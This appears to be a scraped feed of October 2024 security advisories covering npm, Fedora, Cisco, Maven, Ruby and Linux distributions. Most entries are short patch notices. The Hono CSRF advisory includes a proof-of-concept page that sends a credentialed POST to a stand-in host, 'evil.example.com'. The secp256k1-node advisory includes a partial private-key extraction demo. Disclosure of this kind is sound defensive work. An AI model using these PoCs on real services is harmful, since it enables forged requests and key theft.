15.10.2024 22:56:23	npm	[NPM:GHSA-2234-FMW7-43WR] Hano allows bypass of CSRF Middleware by a request without Content-Type header. (moderate)	### SummaryBypass CSRF Middleware by a request without Content-Type herader.### DetailsAlthough the csrf middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe.https://github.com/honojs/hono/blob/cebf4e87f3984a6a034e60a43f542b4c5225b668/src/middleware/csrf/index.ts#L76-L89### PoC```server.js// server.jsimport { Hono } from 'hono'import { csrf }from 'hono/csrf'const app = new Hono()app.use(csrf())app.get('/', (c) => { return c.html('Hello Hono!')})app.post('/', async (c) => { console.log("executed") return c.text( await c.req.text())})Deno.serve(app.fetch)``````poc.html<!-- PoC.html --><script>async function myclick() { await fetch("http://evil.example.com", { method: "POST", credentials: "include", body:new Blob([`test`],{}), });}</script><input type="button" onclick="myclick()" value="run" />```Similarly, the fetch API does not add a Content-Type header for requests that do not include a Body.```PoC2.jsawait fetch("http://localhost:8000", { method: "POST", credentials: "include"});```### ImpactBypass csrf protection implemented with hono csrf middleware.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2234-FMW7-43WR
15.10.2024 18:23:06	fedora	[FEDORA-2024-e717420659] Fedora 41: valkey (high)	update to 8.0.1fixes (CVE-2024-31449) Lua library commands may lead to stack overflow andpotential RCE. (CVE-2024-31227) Potential Denial-of-service due to malformed ACL selectors. (CVE-2024-31228) Potential Denial-of-service due to unbounded patternmatching.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e717420659
15.10.2024 18:23:04	fedora	[FEDORA-2024-aebaa73b1f] Fedora 41: pdns-recursor (high)	Update to latest upstream	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-aebaa73b1f
15.10.2024 22:56:17	maven	[MAVEN:GHSA-CX95-Q6GX-W4QP] SAK-50571 Sakai Kernel users created with type roleview can login as a normal user (high)	### ImpactIllegal access can be granted to the system.### Referencessee https://sakaiproject.atlassian.net/browse/SAK-50571	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CX95-Q6GX-W4QP
15.10.2024 20:36:27	npm	[NPM:GHSA-4WX3-54GH-9FR9] Cross site scripting in markdown-to-jsx (moderate)	Versions of the package markdown-to-jsx before 7.4.0 are vulnerable to Cross-site Scripting (XSS) via the src property due to improper input sanitization. An attacker can execute arbitrary code by injecting a malicious iframe element in the markdown.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4WX3-54GH-9FR9
15.10.2024 12:19:16	almalinux	[ALSA-2024:8024] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8024
15.10.2024 12:17:52	almalinux	[ALSA-2024:8025] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8025
15.10.2024 12:16:16	almalinux	[ALSA-2024:8037] OpenIPMI security update (moderate)	OpenIPMI security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8037
15.10.2024 12:14:31	almalinux	[ALSA-2024:8038] container-tools:rhel8 security update (important)	container-tools:rhel8 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8038
15.10.2024 12:11:06	almalinux	[ALSA-2024:8039] podman security update (important)	podman security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8039
15.10.2024 20:14:02	npm	[NPM:GHSA-434G-2637-QMQR] Elliptic's verify function omits uniqueness validation (low)	The Elliptic package 6.5.5 for Node.js for EDDSA implementation does not perform the required check if the signature proof(s) is within the bounds of the order n of the base point of the elliptic curve, leading to signature malleability. Namely, the `verify` function in `lib/elliptic/eddsa/index.js` omits `sig.S().gte(sig.eddsa.curve.n) \|\| sig.S().isNeg()` validation.This vulnerability could have a security-relevant impact if an application relies on the uniqueness of a signature.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-434G-2637-QMQR
17.10.2024 04:36:03	fedora	[FEDORA-2024-112e897674] Fedora 40: python-virtualenv	Prevent command injection by quoting template strings in activation scripts	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-112e897674
17.10.2024 04:35:57	fedora	[FEDORA-2024-4ffc26d8cb] Fedora 40: dnsdist	Update to latest upstream	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4ffc26d8cb
17.10.2024 04:24:35	fedora	[FEDORA-2024-f7d6b76677] Fedora 39: python-virtualenv	Prevent command injection by quoting template strings in activation scripts	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f7d6b76677
17.10.2024 04:24:31	fedora	[FEDORA-2024-4d68c5928c] Fedora 39: dnsdist	Update to latest upstream	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4d68c5928c
16.10.2024 22:21:00	slackware	[SSA:2024-290-02] mozilla-thunderbird	New mozilla-thunderbird packages are available for Slackware 15.0 tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-thunderbird-115.16.1-i686-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/thunderbird/115.16.1esr/releasenotes/ (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.16.1-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.16.1-x86_64-1_slack15.0.txzMD5 signaturesSlackware 15.0 package:8a59459779943417ee2e97ffd735b265 mozilla-thunderbird-115.16.1-i686-1_slack15.0.txzSlackware x86_64 15.0 package:a8a842ba55a09b1f61571ca1cfe9b773 mozilla-thunderbird-115.16.1-x86_64-1_slack15.0.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-thunderbird-115.16.1-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-290-02
16.10.2024 22:15:56	slackware	[SSA:2024-290-01] libssh2 (medium)	New libssh2 packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/libssh2-1.11.1-i586-1_slack15.0.txz: Upgraded. src: add 'strict KEX' to fix CVE-2023-48795 "Terrapin Attack." For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-48795 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libssh2-1.11.1-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libssh2-1.11.1-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libssh2-1.11.1-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libssh2-1.11.1-x86_64-1.txzMD5 signaturesSlackware 15.0 package:7f1f862a1753e93d5416a61aa8017078 libssh2-1.11.1-i586-1_slack15.0.txzSlackware x86_64 15.0 package:c340f1c1cca794b4766e9df27495b60a libssh2-1.11.1-x86_64-1_slack15.0.txzSlackware -current package:fe91d7142f14ca1f09ddd82db22544a8 l/libssh2-1.11.1-i686-1.txzSlackware x86_64 -current package:4e1ed4ddd560a4bb11daea68dd7e60d0 l/libssh2-1.11.1-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg libssh2-1.11.1-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-290-01
16.10.2024 19:00:00	cisco	[CISCO-SA-UCSC-BKPSKY-TGJ5F73J] Cisco UCS Central Software Configuration Backup Information Disclosure Vulnerability (medium)	A vulnerability in the backup feature of Cisco UCS Central Software could allow an attacker with access to a backup file to learn sensitive information that is stored in the full state and configuration backup files.This vulnerability is due to a weakness in the encryption method that is used for the backup function. An attacker could exploit this vulnerability by accessing a backup file and leveraging a static key that is used for the backup configuration feature. A successful exploit could allow an attacker with access to a backup file to learn sensitive information that is stored in full state backup files and configuration backup files, such as local user credentials, authentication server passwords, Simple Network Management Protocol (SNMP) community names, and the device SSL server certificate and key.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-UCSC-BKPSKY-TGJ5F73J
16.10.2024 19:00:00	cisco	[CISCO-SA-CCMPDM-RXSS-TAX76U3K] Cisco Unified Contact Center Management Portal Reflected Cross-Site Scripting Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Unified Contact Center Management Portal (Unified CCMP) could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CCMPDM-RXSS-TAX76U3K
16.10.2024 19:00:00	cisco	[CISCO-SA-ATA19X-MULTI-RDTEQRSY] Cisco ATA 190 Series Analog Telephone Adapter Firmware Vulnerabilities (high)	Multiple vulnerabilities in Cisco ATA 190 Series Analog Telephone Adapter firmware, both on-premises and multiplatform, could allow a remote attacker to delete or change the configuration, execute commands as the root user, conduct a cross-site scripting (XSS) attack against a user of the interface, view passwords, conduct a cross-site request forgery (CSRF) attack, or reboot the device.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released firmware updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. However, there is a mitigation that addresses some of these vulnerabilities for Cisco ATA 191 on-premises firmware only.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ATA19X-MULTI-RDTEQRSY
16.10.2024 22:25:49	maven	[MAVEN:GHSA-MJVF-4H88-6XM3] Improper Authentication vulnerability in Apache Solr (critical)	Solr instances using the PKIAuthenticationPlugin, which is enabled by default when Solr Authentication is used, are vulnerable to Authentication bypass. A fake ending at the end of any Solr API URL path, will allow requests to skip Authentication while maintaining the API contract with the original URL Path. This fake ending looks like an unprotected API path, however it is stripped off internally after authentication but before API routing.This issue affects Apache Solr: from 5.3.0 before 8.11.4, from 9.0.0 before 9.7.0.Users are recommended to upgrade to version 9.7.0, or 8.11.4, which fix the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MJVF-4H88-6XM3
16.10.2024 22:26:04	maven	[MAVEN:GHSA-H7W9-C5VX-X7J3] Insecure Default Initialization of Resource vulnerability in Apache Solr (high)	New ConfigSets that are created via a Restore command, which copy a configSet from the backup and give it a new name, are created without setting the "trusted" metadata.ConfigSets that do not contain the flag are trusted implicitly if the metadata is missing, therefore this leads to "trusted" ConfigSets that may not have been created with an Authenticated request."trusted" ConfigSets are able to load custom code into classloaders, therefore the flag is supposed to only be set when the request that uploads the ConfigSet is Authenticated & Authorized.This issue affects Apache Solr: from 6.6.0 before 8.11.4, from 9.0.0 before 9.7.0. This issue does not affect Solr instances that are secured via Authentication/Authorization.Users are primarily recommended to use Authentication and Authorization when running Solr. However, upgrading to version 9.7.0, or 8.11.4 will mitigate this issue otherwise.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H7W9-C5VX-X7J3
16.10.2024 15:49:35	rubysec	[RUBYSEC:ACTIONMAILER-2024-47889] Possible ReDoS vulnerability in block_format in Action Mailer	There is a possible ReDoS vulnerability in the block_format helperin Action Mailer. This vulnerability has been assigned theCVE identifier CVE-2024-47889.## ImpactCarefully crafted text can cause the block_format helper to take anunexpected amount of time, possibly resulting in a DoS vulnerability.All users running an affected release should either upgrade or applythe relevant patch immediately.Ruby 3.2 has mitigations for this problem, so Rails applicationsusing Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 requiresRuby 3.2 or greater so is unaffected.## ReleasesThe fixed releases are available at the normal locations.## WorkaroundsUsers can avoid calling the `block_format` helper or upgradeto Ruby 3.2.##CreditsThanks to [ooooooo_q](https://hackerone.com/ooooooo_q) for the report!	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONMAILER-2024-47889
16.10.2024 15:49:35	rubysec	[RUBYSEC:ACTIONPACK-2024-41128] Possible ReDoS vulnerability in query parameter filtering in Action Dispatch	There is a possible ReDoS vulnerability in the query parameterfiltering routines of Action Dispatch. This vulnerability hasbeen assigned the CVE identifier CVE-2024-41128.## ImpactCarefully crafted query parameters can cause query parameterfiltering to take an unexpected amount of time, possibly resultingin a DoS vulnerability. All users running an affected releaseshould either upgrade or apply the relevant patch immediately.Ruby 3.2 has mitigations for this problem, so Rails applicationsusing Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 dependson Ruby 3.2 or greater so is unaffected.## ReleasesThe fixed releases are available at the normal locations.## WorkaroundsUsers on Ruby 3.2 are unaffected by this issue.## CreditsThanks to [scyoon](https://hackerone.com/scyoon) for the report and patches!	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONPACK-2024-41128
16.10.2024 15:49:35	rubysec	[RUBYSEC:ACTIONPACK-2024-47887] Possible ReDoS vulnerability in HTTP Token authentication in Action Controller	There is a possible ReDoS vulnerability in Action Controller'sHTTP Token authentication. This vulnerability has been assignedthe CVE identifier CVE-2024-47887.## ImpactFor applications using HTTP Token authentication via`authenticate_or_request_with_http_token` or similar, a carefullycrafted header may cause header parsing to take an unexpected amountof time, possibly resulting in a DoS vulnerability. All users runningan affected release should either upgrade or apply the relevantpatch immediately.Ruby 3.2 has mitigations for this problem, so Rails applicationsusing Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 dependson Ruby 3.2 or greater so is unaffected.## ReleasesThe fixed releases are available at the normal locations.## WorkaroundsUsers on Ruby 3.2 are unaffected by this issue.## CreditsThanks to [scyoon](https://hackerone.com/scyoon) for reporting	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONPACK-2024-47887
16.10.2024 15:49:35	rubysec	[RUBYSEC:ACTIONTEXT-2024-47888] Possible ReDoS vulnerability in plain_text_for_blockquote_node in Action Text	There is a possible ReDoS vulnerability in theplain_text_for_blockquote_node helper in Action Text. Thisvulnerability has been assigned the CVE identifier CVE-2024-47888.## ImpactCarefully crafted text can cause the plain_text_for_blockquote_nodehelper to take an unexpected amount of time, possibly resultingin a DoS vulnerability. All users running an affected release shouldeither upgrade or apply the relevant patch immediately.Ruby 3.2 has mitigations for this problem, so Rails applicationsusing Ruby 3.2 or newer are unaffected. Rails 8.0.0.beta1 dependson Ruby 3.2 or greater so is unaffected.## ReleasesThe fixed releases are available at the normal locations.## WorkaroundsUsers can avoid calling `plain_text_for_blockquote_node` orupgrade to Ruby 3.2.## CreditsThanks to [ooooooo_q](https://hackerone.com/ooooooo_q) for the report!	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONTEXT-2024-47888
16.10.2024 13:11:51	almalinux	[ALSA-2024:8112] buildah security update (important)	buildah security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8112
17.10.2024 15:33:36	suse	[SUSE-SU-2024:3711-1] Security update for cups-filters (critical)	Security update for cups-filters	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3711-1
18.10.2024 02:22:43	pypi	[PYSEC-2024-109] deepspeed vulnerability (high)	DeepSpeed Remote Code Execution Vulnerability	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-109
19.10.2024 04:54:40	fedora	[FEDORA-2024-80e4603b92] Fedora 40: libarchive	Fix for CVE-2024-48957Automatic update for libarchive-3.7.2-6.fc40.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-80e4603b92
19.10.2024 04:54:35	fedora	[FEDORA-2024-bf524bf5c0] Fedora 40: rust-hyper-rustls, rust-tonic, rust-tonic-build, rust-tonic-types, rust-tower & 6 more	Update the hyper-rustls crate to version 0.27.3.Update the reqwest crate to version 0.12.8.Update the rustls-native-certs crate to version 0.8.0 and add a compat packagefor version 0.7.Update the tonic, tonic-build, and tonic-types crates to version 0.12.3.Update the tower crate to version 0.5.1 and add a compat package for version0.4.Update the tower-http crate to version 0.6.1 and add a compat package forversion 0.5.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-bf524bf5c0
19.10.2024 04:54:32	fedora	[FEDORA-2024-cb2e1f0168] Fedora 40: oath-toolkit	This is new version fixing possible local privilege escalation.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-cb2e1f0168
19.10.2024 04:54:22	fedora	[FEDORA-2024-f7a5b49a73] Fedora 40: libdigidocpp	Upstream release of libdigidocpp	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f7a5b49a73
19.10.2024 04:20:53	fedora	[FEDORA-2024-ff98facbc6] Fedora 39: rust-reqwest, rust-hyper-rustls, rust-tonic, rust-tower-http0.5, rust-tonic-build & 6 more	Update the hyper-rustls crate to version 0.27.3.Update the reqwest crate to version 0.12.8.Update the rustls-native-certs crate to version 0.8.0 and add a compat packagefor version 0.7.Update the tonic, tonic-build, and tonic-types crates to version 0.12.3.Update the tower crate to version 0.5.1 and add a compat package for version0.4.Update the tower-http crate to version 0.6.1 and add a compat package forversion 0.5.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ff98facbc6
19.10.2024 04:20:50	fedora	[FEDORA-2024-18ac02a385] Fedora 39: thunderbird	Update to 115.16.0https://www.thunderbird.net/en-US/thunderbird/115.16.0esr/releasenotes/	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-18ac02a385
19.10.2024 04:20:48	fedora	[FEDORA-2024-dad1d2b46a] Fedora 39: oath-toolkit	This is new version fixing possible local privilege escalation.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-dad1d2b46a
19.10.2024 04:20:29	fedora	[FEDORA-2024-2ba00c906c] Fedora 39: unbound	Fixed builds on F41. Fixes CVE-2024-8508https://github.com/NLnetLabs/unbound/releases/tag/release-1.21.1	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2ba00c906c
18.10.2024 23:19:19	maven	[MAVEN:GHSA-4GC7-5J7H-4QPH] Spring Framework DataBinder Case Sensitive Match Exception (low)	The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive. However, String.toLowerCase() has some Locale dependent exceptions that could potentially result in fields not protected as expected.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4GC7-5J7H-4QPH
18.10.2024 12:40:19	almalinux	[ALSA-2024:8117] java-1.8.0-openjdk security update (moderate)	java-1.8.0-openjdk security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8117
18.10.2024 12:37:55	almalinux	[ALSA-2024:8121] java-11-openjdk security update (moderate)	java-11-openjdk security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8121
18.10.2024 12:31:21	almalinux	[ALSA-2024:8124] java-17-openjdk security update (moderate)	java-17-openjdk security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8124
18.10.2024 12:27:13	almalinux	[ALSA-2024:8127] java-21-openjdk security update (moderate)	java-21-openjdk security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8127
18.10.2024 12:22:49	almalinux	[ALSA-2024:8180] webkit2gtk3 security update (important)	webkit2gtk3 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8180
18.10.2024 03:00:00	freebsd	[FREEBSD:815BF172-AB9E-4C4B-9662-D18B0054330D] electron{31,32} -- multiple vulnerabilities	Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-9602. Security: backported fix for CVE-2024-9603.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:815BF172-AB9E-4C4B-9662-D18B0054330D
20.10.2024 03:54:53	fedora	[FEDORA-2024-c0b1d26de3] Fedora 39: chromium	Update to 130.0.6723.58 * High CVE-2024-9954: Use after free in AI * Medium CVE-2024-9955: Use after free in Web Authentication * Medium CVE-2024-9956: Inappropriate implementation in Web Authentication * Medium CVE-2024-9957: Use after free in UI * Medium CVE-2024-9958: Inappropriate implementation in PictureInPicture * Medium CVE-2024-9959: Use after free in DevTools * Medium CVE-2024-9960: Use after free in Dawn * Medium CVE-2024-9961: Use after free in Parcel Tracking * Medium CVE-2024-9962: Inappropriate implementation in Permissions * Medium CVE-2024-9963: Insufficient data validation in Downloads * Low CVE-2024-9964: Inappropriate implementation in Payments * Low CVE-2024-9965: Insufficient data validation in DevTools * Low CVE-2024-9966: Inappropriate implementation in Navigations	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c0b1d26de3
20.10.2024 03:54:39	fedora	[FEDORA-2024-5d581b2365] Fedora 39: apache-commons-io	Fixes possible denial of service attack on untrusted input	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5d581b2365
20.10.2024 01:49:39	fedora	[FEDORA-2024-5a61a2fa45] Fedora 41: buildah, containers-common, podman	Automatic update for buildah-1.37.5-1.fc41.Changelog for buildah* Fri Oct 18 2024 Packit <hello(a)packit.dev> - 2:1.37.5-1- Update to 1.37.5 upstream releaseFixes CVE-2024-9341, CVE-2024-9675 and CVE-2024-9676.bugfix	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5a61a2fa45
19.10.2024 04:55:17	fedora	[FEDORA-2024-4d80983af6] Fedora 40: chromium	Update to 130.0.6723.58 * High CVE-2024-9954: Use after free in AI * Medium CVE-2024-9955: Use after free in Web Authentication * Medium CVE-2024-9956: Inappropriate implementation in Web Authentication * Medium CVE-2024-9957: Use after free in UI * Medium CVE-2024-9958: Inappropriate implementation in PictureInPicture * Medium CVE-2024-9959: Use after free in DevTools * Medium CVE-2024-9960: Use after free in Dawn * Medium CVE-2024-9961: Use after free in Parcel Tracking * Medium CVE-2024-9962: Inappropriate implementation in Permissions * Medium CVE-2024-9963: Insufficient data validation in Downloads * Low CVE-2024-9964: Inappropriate implementation in Payments * Low CVE-2024-9965: Insufficient data validation in DevTools * Low CVE-2024-9966: Inappropriate implementation in Navigations	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4d80983af6
21.10.2024 22:09:45	npm	[NPM:GHSA-584Q-6J8J-R5PM] secp256k1-node allows private key extraction over ECDH (high)	### SummaryIn `elliptic`-based version, `loadUncompressedPublicKey` has a check that the public key is on the curve: https://github.com/cryptocoinjs/secp256k1-node/blob/6d3474b81d073cc9c8cc8cfadb580c84f8df5248/lib/elliptic.js#L37-L39`loadCompressedPublicKey` is, however, missing that check: https://github.com/cryptocoinjs/secp256k1-node/blob/6d3474b81d073cc9c8cc8cfadb580c84f8df5248/lib/elliptic.js#L17-L19That allows the attacker to use public keys on low-cardinality curves to extract enough information to fully restore the private key from as little as 11 ECDH sessions, and very cheaply on compute powerOther operations on public keys are also affected, including e.g. `publicKeyVerify()` incorrectly returning `true` on those invalid keys, and e.g. `publicKeyTweakMul()` also returning predictable outcomes allowing to restore the tweak ### DetailsThe curve equation is `Y^2 = X^3 + 7`, and it restores `Y` from `X` in `loadCompressedPublicKey`, using `Y = sqrt(X^3 + 7)`, but when there are no valid `Y` values satisfying `Y^2 = X^3 + 7` for a given `X`, the same code calculates a solution for `-Y^2 = X^3 + 7`, and that solution also satisfies some other equation `Y^2 = X^3 + D`, where `D` is not equal to 7 and might be on a curve with factorizable cardinality, so `(X,Y)` might be a low-order point on that curve, lowering the number of possible ECDH output values to bruteforcableThose output values correspond to remainders which can be then combined with Chinese remainder theorem to restore the original valueEndomorphism-based multiplication only slightly hinders restoration and does not affect the fact that the result is low-order10 different malicious X values could be chosen so that the overall extracted information is 238.4 bits out of 256 bit private key, and the rest is trivially bruteforcable with an additional 11th public key (which might be valid or not -- not significant)The attacker does not need to _receive_ the ECDH value, they only need to be able to confirm it against a list of possible candidates, e.g. check if using it to decipher block/stream cipher would work -- and that could all be done locally on the attacker side### PoC#### Example public keyThis key has order 39One of the possible outcomes for it is a throw, 38 are predictable ECDH valuesKeys used in full attack have higher order (starting from ~20000), so are very unlikely to cause an error```jsimport secp256k1 from 'secp256k1/elliptic.js'import { randomBytes } from 'crypto'const pub = Buffer.from('028ac57f9c6399282773c116ef21f7394890b6140aa6f25c181e9a91e2a9e3da45', 'hex')const seen = new Set()for (let i = 0; i < 1000; i++) { try { seen.add(Buffer.from(secp256k1.ecdh(pub, randomBytes(32))).toString('hex')) } catch { seen.add('failure also is an outcome') }}console.log(seen.size) // 39```#### Full attackThis PoC doesn't list the exact public keys or the code for `solver.js` intentionally, but this exact code works, on arbitrary random private keys:```js// Only the elliptic version is affected, gyp one isn't// Node.js can use both, Web/RN/bundles always use the elliptic versionimport secp256k1 from 'secp256k1/elliptic.js'import { randomBytes } from 'node:crypto'import assert from 'node:assert/strict'import { Solver } from './solver.js'const privateKey = randomBytes(32)// The full dataset is precomputed on a single MacBook Air in a few days and can be reused for any private keyconst solver = new Solver// We need to run on 10 specially crafted public keys for this// Lower than 10 is possible but requires more computefor (let i = 0; i < 10; i++) { const letMeIn = solver.ping() // this is a normal 33-byte Uint8Array, a 02/03-prefixed compressed public key assert(letMeIn instanceof Uint8Array) // true assert(secp256k1.publicKeyVerify(letMeIn)) // true // Returning ecdh value is not necessary but is used in this demo for simplicity // Solver needs to _confirm_ an ecdh value against a set of precalculated known ones, // which can be done even after it's hashed or used e.g. for a stream/block cipher, based on the encrypted data solver.callback(secp256k1.ecdh(letMeIn, privateKey)) // Btw we have those precomputed so we can actually use those sessions to lower suspicion, most -- instantly}// Now, we need a single valid (or another invalid) public key to recheck things against// It can be anything, e.g. we can specify an 11th one, or create a valid one and use it// We'll be able to confirm/restore and use the ecdh value for this session too upon privateKey extractionconst anyPublicKey = secp256k1.publicKeyCreate(randomBytes(32))assert(secp256k1.publicKeyVerify(anyPublicKey)) // true (obviously)// Full complexity of this exploit requires solver to perform ~ 2^35 ecdh value checks (for all 10 keys combined),// which is ~ 1 TiB -- that can be done offline and does not require any further interaction with the target// The exact speed of the comparison step depends on how the ecdh values are used, but is not very significant// Direct non-indexed linear scan over all possible (precomputed) values takes <10 minutes on a MacBook Air// Confirming against e.g. cipher output would be somewhat slower, but still definitely possible + also could be precomputedconst extracted = solver.stab(anyPublicKey, secp256k1.ecdh(anyPublicKey, privateKey))console.log(`Extracted private key: ${extracted.toString('hex')}`)console.log(`Actual private key was: ${privateKey.toString('hex')}`)assert(extracted.toString('hex') === privateKey.toString('hex'))console.log('Oops')```Result:```consoleExtracted private key: e3370b1e6726a6ceaa51a2aacf419e25244e0cde08596780da021b238b74df3dActual private key was: e3370b1e6726a6ceaa51a2aacf419e25244e0cde08596780da021b238b74df3dOopsnode example.js 178.80s user 13.59s system 74% cpu 4:17.01 total```### ImpactRemote private key is extracted over 11 ECDH sessionsThe attack is very low-cost, precompute took a few days on a single MacBook Air, and extraction takes ~10 minutes on the same MacBook AirAlso:* `publicKeyVerify()` misreports malicious public keys as valid* Same affects tweak extraction from `publicKeyTweakMul` result and other public key operations	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-584Q-6J8J-R5PM
21.10.2024 15:38:15	ubuntu	[USN-7062-2] libgsf vulnerabilities (high)	libgsf could be made to run programs as your login if it opened a speciallycrafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7062-2
21.10.2024 15:33:17	ubuntu	[USN-7042-3] cups-browsed vulnerability (medium)	cups-browsed could be made to run programs if it received specially craftednetwork traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7042-3
23.10.2024 04:34:22	fedora	[FEDORA-2024-8b08786765] Fedora 40: suricata	Various security, performance, accuracy, and stability issues have been fixed.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8b08786765
23.10.2024 04:34:17	fedora	[FEDORA-2024-1949806a59] Fedora 40: wireshark (high)	New version 4.2.8Fix for CVE-2024-9781	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1949806a59
22.10.2024 21:17:03	npm	[NPM:GHSA-M4GQ-X24J-JPMF] Mermaid allows prototype pollution in bundled version of DOMPurify (high)	The following bundled files within the Mermaid NPM package contain a bundled version of DOMPurify that is vulnerable to https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674, potentially resulting in an XSS attack.This affects the built:- `dist/mermaid.min.js`- `dist/mermaid.js`- `dist/mermaid.esm.mjs`- `dist/mermaid.esm.min.mjs`This will also affect users that use the above files via a CDN link, e.g. `https://cdn.jsdelivr.net/npm/mermaid@10.9.2/dist/mermaid.min.js`Users that use the default NPM export of `mermaid`, e.g. `import mermaid from 'mermaid'`, or the `dist/mermaid.core.mjs` file, do not use this bundled version of DOMPurify, and can easily update using their package manager with something like `npm audit fix`.### Patches- `develop` branch: 6c785c93166c151d27d328ddf68a13d9d65adc00- backport to v10: 92a07ffe40aab2769dd1c3431b4eb5beac282b34	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M4GQ-X24J-JPMF
